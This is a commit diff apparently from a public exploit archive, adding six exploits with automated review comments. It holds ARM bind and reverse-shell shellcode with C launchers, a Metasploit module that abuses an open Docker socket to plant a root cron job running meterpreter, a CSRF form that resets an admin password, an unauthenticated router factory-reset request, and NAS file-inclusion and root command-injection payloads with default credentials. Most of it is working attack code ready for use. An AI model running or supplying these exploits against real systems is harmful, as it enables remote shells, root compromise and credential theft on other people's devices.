DB: 2017-09-12
6 new exploits Docker Daemon - Unprotected TCP Socket (Metasploit) Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes) Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes) Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin) FiberHome ADSL AN1020-25 - Improper Access Restrictions WiseGiga NAS - Multiple Vulnerabilities
This commit is contained in:
parent
7744909119
commit
36667e62bc
7 changed files with 714 additions and 0 deletions
@ -15797,6 +15797,7 @@ id,file,description,date,author,platform,type,port
42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0
42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
42630,platforms/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
42650,platforms/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16443,6 +16444,8 @@ id,file,description,date,author,platform,type,port
42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86_64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
42594,platforms/lin_x86/shellcode/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",lin_x86,shellcode,0
42646,platforms/arm/shellcode/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
42647,platforms/arm/shellcode/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -38427,3 +38430,6 @@ id,file,description,date,author,platform,type,port
42643,platforms/php/webapps/42643.txt,"Law Firm 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42644,platforms/php/webapps/42644.html,"Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42645,platforms/php/webapps/42645.txt,"My Builder Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42648,platforms/php/webapps/42648.html,"Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin)",2017-09-11,"Ihsan Sencan",php,webapps,0
42649,platforms/hardware/webapps/42649.txt,"FiberHome ADSL AN1020-25 - Improper Access Restrictions",2017-09-05,"Ibad Shah",hardware,webapps,0
42651,platforms/hardware/webapps/42651.txt,"WiseGiga NAS - Multiple Vulnerabilities",2017-09-11,"Pierre Kim",hardware,webapps,0
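--- a/platforms/arm/shellcode/42646.c
+++ b/platforms/arm/shellcode/42646.c
@@ -0,0 +1,89 @@
+/*
+
+##################################
+# Andrea Sindoni - @invictus1306 #
+##################################
+
+This schellcode is part of my episodes:
+- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/
+
+Enviroment: Raspberry pi 3
+
+Default settings for port:4444
+
+@.syntax unified
+.global _start
+_start:
+
+mov r1, #0x5C @ r1=0x5c
+mov r5, #0x11 @ r5=0x11
+mov r1, r1, lsl #24 @ r1=0x5c000000
+add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) --- Please change me
+add r1, #2 @ r1=0x5c110002 - sin_family+sin_port
+sub r2, r2, r2 @ sin_addr
+push {r1, r2} @ push into the stack r1 and r2
+mov r1, sp @ save pointer to sockaddr_in struct
+mov r2, #0x10 @ addrlen
+mov r0, r6 @ mov sockfd into r0
+ldr r7, =#282 @ bind syscall
+swi 0
+
+@ listen for incoming connections via SYS_LISTEN
+@ int listen(int sockfd, int backlog);
+
+mov r0, r6 @ mov sockfd into r0
+mov r1, #1 @ backlog=1
+ldr r7, =#284 @ listen syscall
+swi 0
+
+@ Accept connections
+@ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
+
+mov r0, r6 @ mov sockfd into r0
+sub r1, r1, r1 @ addr=0
+sub r2, r2, r2 @ addrlen=0
+ldr r7, =#285 @ accept syscall
+swi 0
+
+@ Redirect stdin, stdout and stderr via dup2
+
+mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2)
+loop:
+mov r7, #63 @ dup2 syscall
+swi 0
+sub r1, r1, #1 @ decrement counter
+cmp r1, #-1 @ compare r1 with -1
+bne loop @ if the result is not equal jmp to loop
+
+@ int execve(const char *filename, char *const argv[],char *const envp[]);
+mov r0, pc
+add r0, #32
+sub r2, r2, r2
+push {r0, r2}
+mov r1, sp
+mov r7, #11
+swi 0
+
+_exit:
+mov r0, #0
+mov r7, #1
+swi 0 @ exit(0)
+
+.asciz "/bin/sh"
+
+Assemble and link it:
+as -o bind.o bind.s
+ld -o bind bind.o
+*/
+
+#include <stdio.h>
+
+char *code="\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\xa0\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x70\x70\x9f\xe5\x00\x00\x00\xef\x06\x00\xa0\xe1\x01\x10\xa0\xe3\x47\x7f\xa0\xe3\x00\x00\x00\xef\x06\x00\xa0\xe1\x01\x10\x41\xe0\x02\x20\x42\xe0\x50\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xfa\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\x1a\x01\x00\x00\x1d\x01\x00\x00";
+
+int main(void) {
+
+(*(void(*)()) code)();
+
+return 0;
+
+}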
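Review bot: The assembly listing in the header comment does not match the byte string assigned to `code`: decoding the first 24 bytes gives `mov r0, #2`, `mov r1, #1`, `mov r2, #0`, a pc-relative `ldr r7`, `swi 0` and `mov r6, r0` (the socket() call that defines r6), none of which appear in the listing, so the listing reads r6 as sockfd at `mov r0, r6` without ever assigning it and cannot be assembled into the same 192 bytes. The listing in platforms/arm/shellcode/42647.c has the same omission. At minimum a comment before `mov r1, #0x5C` should say that the socket() call and the `mov r6, r0` that saves its result are left out of the listing. It would also help to note that the three trailing words of the byte string (`\x19\x01\x00\x00`, `\x1a\x01\x00\x00`, `\x1d\x01\x00\x00`) are presumably the literal pool emitted for the `ldr r7, =#NNN` forms, since the listen number is instead encoded as a rotated immediate (`\x47\x7f\xa0\xe3`).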
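--- a/platforms/arm/shellcode/42647.c
+++ b/platforms/arm/shellcode/42647.c
@@ -0,0 +1,71 @@
+/*
+
+##################################
+# Andrea Sindoni - @invictus1306 #
+##################################
+
+This schellcode is part of my episodes:
+- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/
+
+Enviroment: Raspberry pi 3
+
+Default settings for port:4444 ip:192.168.0.12
+
+.global _start
+_start:
+
+mov r1, #0x5C @ r1=0x5c
+mov r5, #0x11 @ r5=0x11
+mov r1, r1, lsl #24 @ r1=0x5c000000
+add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) -- please change me
+add r1, #2 @ r1=0x5c110002 - sin_family+sin_port
+ldr r2, =#0x0c00a8c0 @ sin_addr=192.168.0.12 each octet is represented by one byte -- please change me
+push {r1, r2} @ push into the stack r1 and r2
+mov r1, sp @ save pointer to sockaddr_in struct
+
+mov r2, #0x10 @ addrlen
+mov r0, r6 @ mov sockfd into r0
+ldr r7, =#283 @ connect syscall
+swi 0
+
+@ Redirect stdin, stdout and stderr via dup2
+mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2)
+loop:
+mov r0, r6 @ mov sockfd into r0
+mov r7, #63 @ dup2 syscall
+swi 0
+sub r1, r1, #1 @ decrement counter
+cmp r1, #-1 @ compare r1 with -1
+bne loop @ if the result is not equal jmp to loop
+
+@ int execve(const char *filename, char *const argv[],char *const envp[]);
+
+mov r0, pc
+add r0, #32
+sub r2, r2, r2
+push {r0, r2}
+mov r1, sp
+mov r7, #11
+swi 0
+
+_exit:
+mov r0, #0
+mov r7, #1
+swi 0 @ exit(0)
+
+shell: .asciz "/bin/sh"
+
+
+Assemble and link it:
+as -o reverse_shell.o reverse_shell.s
+ld -o reverse_shell reverse_shell.o
+*/
+
+#include <stdio.h>
+
+char *code= "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\x80\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x64\x20\x9f\xe5\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x54\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xf9\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\xc0\xa8\x00\x0c\x1b\x01\x00\x00";
+
+int main(void) {
+(*(void(*)()) code)();
+return 0;
+}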
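--- a/platforms/hardware/webapps/42649.txt
+++ b/platforms/hardware/webapps/42649.txt
@@ -0,0 +1,135 @@
+Title:
+====
+
+FiberHome Unauthenticated ADSL Router Factory Reset.
+
+Credit:
+======
+
+Name: Ibad Shah
+Twitter: @BeeFaauBee09
+Website: beefaaubee09.github.io
+
+
+CVE:
+=====
+
+CVE-2017-14147
+
+Date:
+====
+
+05-09-2017 (dd/mm/yyyy)
+
+About FiberHome:
+======
+
+FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.
+
+Products & Services:
+Wireless 3G/4G broadband devices
+Custom engineered technologies
+Broadband devices
+
+URL : http://www.fiberhomegroup.com/
+
+
+Description:
+=======
+
+This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password.
+
+
+
+Affected Device Model:
+=============
+
+FiberHome ADSL AN1020-25
+
+
+Exploitation-Technique:
+===================
+
+Remote
+
+
+Details:
+=======
+
+Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials.
+
+1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147
+
+Vulnerable restoreinfo.cgi
+
+
+
+Proof Of Concept:
+================
+
+PoC :
+
+GET /restoreinfo.cgi HTTP/1.1
+Host: 192.168.1.1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8
+Connection: close
+
+
+HTTP/1.1 200 Ok
+Server: micro_httpd
+Cache-Control: no-cache
+Date: Sat, 01 Jan 2000 00:12:39 GMT
+Content-Type: text/html
+Connection: close
+
+<html>
+<head>
+<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
+<link rel=stylesheet href='stylemain.css' type='text/css'>
+<link rel=stylesheet href='colors.css' type='text/css'>
+<script language="javascript">
+<!-- hide
+
+function restore() {
+var enblPopWin = '0';
+var loc = 'main.html';
+var code = 'window.top.location="' + loc + '"';
+
+if ( enblPopWin == '1' ) {
+loc = 'index.html';
+code = 'location="' + loc + '"';
+}
+
+eval(code);
+}
+
+function frmLoad() {
+setTimeout("restore()", 60000);
+}
+
+// done hiding -->
+</script>
+</head>
+
+<body onLoad='frmLoad()'>
+<blockquote>
+<b>DSL Router Restore</b><br><br>
+The DSL Router configuration has been restored to default settings and the
+router is rebooting.<br><br>
+Close the DSL Router Configuration window and wait for 2 minutes before
+reopening your web browser. If necessary, reconfigure your PC's IP address to
+match your new configuration.
+</blockquote>
+</body>
+</html>
+
+
+
+Credits:
+=======
+
+Ibad Shah, Taimooor Zafar, Owais Mehtab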
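Review bot: The advisory has no vendor-response or fix-status section and names no firmware version for the AN1020-25, so a reader cannot tell whether a patched build exists or which builds are affected; the WiseGiga advisory added in the same commit carries a "Vendor response" section, and this one should state the same even if only as `Vendor response: [not stated]` with the date of the disclosure attempt. The "Details" section opens with "Below listed vulnerability" and the summary speaks of bypassing authentication, but the only item listed is the single unauthenticated `GET /restoreinfo.cgi`, so the wording could say plainly that one issue is described. The `Date:` line gives `05-09-2017` while claiming the `dd/mm/yyyy` format; the separator should match the format it announces.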
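--- a/platforms/hardware/webapps/42651.txt
+++ b/platforms/hardware/webapps/42651.txt
@@ -0,0 +1,171 @@
+Source: https://blogs.securiteam.com/index.php/archives/3402
+
+Vulnerabilities summary
+The following advisory describes five (5) vulnerabilities and default accounts / passwords found in WiseGiga NAS devices.
+
+WiseGiga is a Korean company selling NAS products.
+
+The vulnerabilities found in WiseGiga NAS are:
+
+Pre-Authentication Local File Inclusion (4 different vulnerabilities)
+Post-Authentication Local File Inclusion
+Remote Command Execution as root
+Remote Command Execution as root with CSRF
+Info Leak
+Default accounts
+
+
+Credit
+An independent security researcher, Pierre Kim, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
+
+
+Vendor response
+We tried to contact WiseGiga since June 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
+
+
+Vulnerabilities details
+
+Pre-Authentication Local File Inclusion
+User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).
+
+By sending GET request to the following URI’s with filename= as a parameter, an attacker can trigger the vulnerabilities:
+
+/webfolder/download_file1.php
+down_data.php
+download_file.php
+mobile/download_file1.php
+
+
+Proof of Concept
+http://IP/webfolder/download_file1.php?filename=/etc/passwd
+http://IP/down_data.php?filename=/etc/passwd
+http://IP/download_file.php?filename=base64(/etc/passwd)
+http://IP/mobile/download_file1.php?filename=base64(/etc/passwd)
+
+Post-Authentication Local File Inclusion
+User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).
+
+By sending GET request to /mobile/download_file2.php an attacker can trigger the vulnerability.
+
+
+Proof of Concept
+http://IP//mobile/download_file2.php?filename=base64(/etc/passwd)
+
+
+Remote Command Execution as root
+The WiseGiga NAS firmware contain pre.php files in the different directories.
+
+For example:
+/app_data/apache/htdocs/auto/pre.php
+/app_data/apache/htdocs/admin/iframe/pre.php
+/app_data/apache/htdocs/admin/pre.php
+/app_data/apache/htdocs/mobile/pre.php
+/app_data/apache/htdocs/wiseapp/config/pre.php
+/app_data/apache/htdocs/pre.php
+/home/htdocs/webfolder/pre.php
+/ub/update/init/pre.php
+/tmp/home/root/htdocs/auto/pre.php
+/tmp/home/root/htdocs/pre.php
+
+
+A “standard” pre.php contains:
+
+181 [...]
+182 function auth()
+183 {
+184 global $memberid;
+185 session_start();
+186 //echo $memberid;
+187 if($memberid=="root")
+188 {
+189 // print<<<__DATA_OF_HTML__
+190 //<script language="JavaScript">
+191 // alert("sucess !");
+192 //</script>
+193 //__DATA_OF_HTML__;
+194 }
+195 else
+196 {
+197 print<<<__DATA_OF_HTML__
+198 <script language="JavaScript">
+199 alert("\xc0\xce\xc1\xf5\xb9\xde\xc1\xf6 \xbe\xca\xc0\xba \xbb\xe7\xbf\xeb\xc0\xda\xc0\xd4\xb4\xcf\xb4\xd9!");
+200 // location.href='/admin/';
+201 window.open('index.php','_parent');
+202 exit;
+203 </script>
+204 __DATA_OF_HTML__;
+205 }
+206
+207 }
+
+
+Using global $memberid (line 184), the attacker can override the authentication, by specifying a valid user (“root”) inside the HTTP request:
+
+GET /webpage[...]?memberid=root&[...] HTTP/1.0
+
+
+The pre.php files also contains a function called root_exec_cmd() that is a wrapper to popen():
+
+23 function root_exec_cmd($cmd)
+24 {
+25 $tmpfile=fopen("/tmp/ramdisk/cmd.list","w");
+26 fwrite($tmpfile,$cmd);
+27 fclose($tmpfile);
+28 popen("/tmp/ramdisk/ramush","r");
+29 }
+
+By sending a GET request to root_exec_cmd() with user controlled $cmd variable input an attacker can execute arbitrary commands
+
+The WiseGiga NAS run’s the Apache server as root (uid=0 with gid=48 “apache”) hence the commands will execute as root.
+
+
+Proof of Concept
+By sending GET request to /admin/group.php with parameter ?cmd=add the WiseGiga NAS will call the add_system() function:
+
+178 if($cmd == "add")
+179 {
+180 add_system();
+181 }
+
+The add_system() function uses global for $group_name and $user_data.
+
+Then it will pass the user controlled input and will run it as root:
+
+145 function add_system()
+146 {
+147 global $group_name,$user_data;
+148
+149 if(add_conf()==1)
+150 {
+151 //====================================================================================
+152 root_exec_cmd("addgroup $group_name");
+
+
+An attacker can get unauthenticated RCE as root by sending the following request:
+
+http://IP/admin/group.php?memberid=root&cmd=add&group_name=d;id%20>%20/tmp/a
+
+The file /tmp/a will contain:
+
+uid=0(root) gid=48(apache) groups=48(apache)
+
+
+Remote Command Execution as root with CSRF
+There is no CSRF protection in WiseGiga NAS.
+
+An attacker can force the execution of a command as root when the victim visits the malicious website.
+
+
+Proof of Concept
+Once the victim visit the attacker’s website with the following code, the attacker can execute arbitrary commands.
+
+<img src="http://192.168.1.1/admin/group.php?memberid=root&cmd=add&group_name=d;COMMANDTOEXECUTE">
+
+
+InfoLeak
+accessing http://IP/webfolder/config/config.php will disclose the PHP configuration.
+
+
+Default accounts
+Username: guest
+Password: guest09#$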
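Review bot: The root cause of the `memberid=root` bypass is never named: `global $memberid` in auth() only becomes request-controlled if the firmware imports request parameters into the global scope (presumably register_globals or an equivalent extract of $_GET/$_POST), and stating which mechanism is in use matters because that import, not the single auth() function, is what a fix or a detection rule has to target. The summary counts "default accounts / passwords" in the plural, but the "Default accounts" section lists only the guest account, so either more entries are missing or the summary overstates. The Post-Authentication PoC URL `http://IP//mobile/download_file2.php` carries a doubled slash that reads as a typo for `http://IP/mobile/download_file2.php`.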
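--- a/platforms/php/webapps/42648.html
+++ b/platforms/php/webapps/42648.html
@@ -0,0 +1,35 @@
+<!--
+# # # # #
+# Exploit Title: Nimble Professional - Mobile Marketing Text Blast Web Application 1.0 - Cross-Site Request Forgery (Update Admin)
+# Dork: N/A
+# Date: 11.09.2017
+# Vendor Homepage: http://ranksol.com/
+# Software Link: http://www.mojomarketplace.com/item/nimble-pro
+# Demo: http://demo.ranksol.com/demos/nimble-messaging-bulk-sms-marketing-application-for-business-pro-version/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+#
+# Proof of Concept:
+-->
+<html>
+<body>
+<label>Edit Profile:</label>
+<form method="post" class="form-horizontal" action="http://localhost/[PATH]/ajax.php">
+<label>Admin Name:</label>
+<input type="text" name="name" style="width: 400px;" value="Admin">
+<label>Admin Email:</label>
+<input type="text" name="email" style="width: 400px;" value="a@a.com">
+<label>Admin Password:</label>
+<input type="text" name="pass" style="width: 400px;" value="efe">
+<button type="submit" class="btn btn-success" >Save Profile</button>
+<input type="hidden" name="cmd" value="save_profile">
+</form>
+</body>
+</html>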
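--- a/platforms/python/remote/42650.rb
+++ b/platforms/python/remote/42650.rb
@@ -0,0 +1,207 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::FileDropper
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Docker Daemon - Unprotected TCP Socket Exploit',
+'Description' => %q{
+Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp
+with tls but without tls-auth), an attacker can create a Docker
+container with the '/' path mounted with read/write permissions on the
+host server that is running the Docker container. As the Docker
+container executes command as uid 0 it is honored by the host operating
+system allowing the attacker to edit/create files owned by root. This
+exploit abuses this to creates a cron job in the '/etc/cron.d/' path of
+the host server.
+
+The Docker image should exist on the target system or be a valid image
+from hub.docker.com.
+},
+'Author' => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre
+'License' => MSF_LICENSE,
+'References' => [
+['URL', 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'],
+['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket']
+],
+'DisclosureDate' => 'Jul 25, 2017',
+'Targets' => [
+[ 'Python', {
+'Platform' => 'python',
+'Arch' => ARCH_PYTHON,
+'Payload' => {
+'Compat' => {
+'ConnectionType' => 'reverse noconn none tunnel'
+}
+}
+}]
+],
+'DefaultOptions' => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' },
+'DefaultTarget' => 0))
+
+register_options(
+[
+Opt::RPORT(2375),
+OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
+OptString.new('CONTAINER_ID', [ false, 'container id you would like'])
+]
+)
+end
+
+def check_image(image_id)
+vprint_status("Check if images exist on the target host")
+res = send_request_raw(
+'method' => 'GET',
+'uri' => normalize_uri('images', 'json')
+)
+return unless res and res.code == 200 and res.body.include? image_id
+
+res
+end
+
+def pull_image(image_id)
+print_status("Trying to pulling image from docker registry, this may take a while")
+res = send_request_raw(
+'method' => 'POST',
+'uri' => normalize_uri('images', 'create?fromImage=' + image_id)
+)
+return unless res.code == 200
+
+res
+end
+
+def make_container_id
+return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
+
+rand_text_alpha_lower(8)
+end
+
+def make_cmd(mnt_path, cron_path, payload_path)
+vprint_status('Creating the docker container command')
+echo_cron_path = mnt_path + cron_path
+echo_payload_path = mnt_path + payload_path
+
+cron_command = "python #{payload_path}"
+payload_data = payload.raw
+
+command = "echo \"#{payload_data}\" >> #{echo_payload_path} && "
+command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && "
+command << "echo \"\" >> #{echo_cron_path} && "
+command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}"
+
+command
+end
+
+def make_container(mnt_path, cron_path, payload_path)
+vprint_status('Setting container json request variables')
+{
+'Image' => datastore['DOCKERIMAGE'],
+'Cmd' => make_cmd(mnt_path, cron_path, payload_path),
+'Entrypoint' => %w[/bin/sh -c],
+'HostConfig' => {
+'Binds' => [
+'/:' + mnt_path
+]
+}
+}
+end
+
+def del_container(container_id)
+send_request_raw(
+{
+'method' => 'DELETE',
+'uri' => normalize_uri('containers', container_id)
+},
+1 # timeout
+)
+end
+
+def check
+res = send_request_raw(
+'method' => 'GET',
+'uri' => normalize_uri('containers', 'json'),
+'headers' => { 'Accept' => 'application/json' }
+)
+
+if res.nil?
+print_error('Failed to connect to the target')
+return Exploit::CheckCode::Unknown
+end
+
+if res and res.code == 200 and res.headers['Server'].include? 'Docker'
+return Exploit::CheckCode::Vulnerable
+end
+
+Exploit::CheckCode::Safe
+end
+
+def exploit
+# check if target is vulnerable
+unless check == Exploit::CheckCode::Vulnerable
+fail_with(Failure::Unknown, 'Failed to connect to the target')
+end
+
+# check if image is not available, pull it or fail out
+image_id = datastore['DOCKERIMAGE']
+if check_image(image_id).nil?
+fail_with(Failure::Unknown, 'Failed to pull the docker image') if pull_image(image_id).nil?
+end
+
+# create required information to create json container information.
+cron_path = '/etc/cron.d/' + rand_text_alpha(8)
+payload_path = '/tmp/' + rand_text_alpha(8)
+mnt_path = '/mnt/' + rand_text_alpha(8)
+container_id = make_container_id
+
+# create container
+res_create = send_request_raw(
+'method' => 'POST',
+'uri' => normalize_uri('containers', 'create?name=' + container_id),
+'headers' => { 'Content-Type' => 'application/json' },
+'data' => make_container(mnt_path, cron_path, payload_path).to_json
+)
+fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201
+
+print_status("The docker container is created, waiting for deploy")
+register_files_for_cleanup(cron_path, payload_path)
+
+# start container
+send_request_raw(
+{
+'method' => 'POST',
+'uri' => normalize_uri('containers', container_id, 'start')
+},
+1 # timeout
+)
+
+# wait until container stopped
+vprint_status("Waiting until the docker container stopped")
+res_wait = send_request_raw(
+'method' => 'POST',
+'uri' => normalize_uri('containers', container_id, 'wait'),
+'headers' => { 'Accept' => 'application/json' }
+)
+
+# delete container
+deleted_container = false
+if res_wait.code == 200
+vprint_status("The docker container has been stopped, now trying to remove it")
+del_container(container_id)
+deleted_container = true
+end
+
+# if container does not deploy, remove it and fail out
+unless deleted_container
+del_container(container_id)
+fail_with(Failure::Unknown, "The docker container failed to deploy")
+end
+print_status('Waiting for the cron job to run, can take up to 60 seconds')
+end
+end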
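Review bot: Three response handlers dereference a response that can be nil, while check_image guards with `res and`: `return unless res.code == 200` in pull_image, `res.headers['Server'].include? 'Docker'` in check (a reply without a Server header makes this `nil.include?`), and `if res_wait.code == 200` in exploit. The check method itself anticipates send_request_raw returning nil on connection failure or timeout, so the `wait` call in exploit raising NoMethodError on a slow container would abort before the `del_container` cleanup and leave the created container on the target. Suggested lines: `return unless res && res.code == 200`, `if res.code == 200 && res.headers['Server'].to_s.include?('Docker')`, and `if res_wait && res_wait.code == 200`. The `res and` in check is redundant after the `res.nil?` return three lines above it.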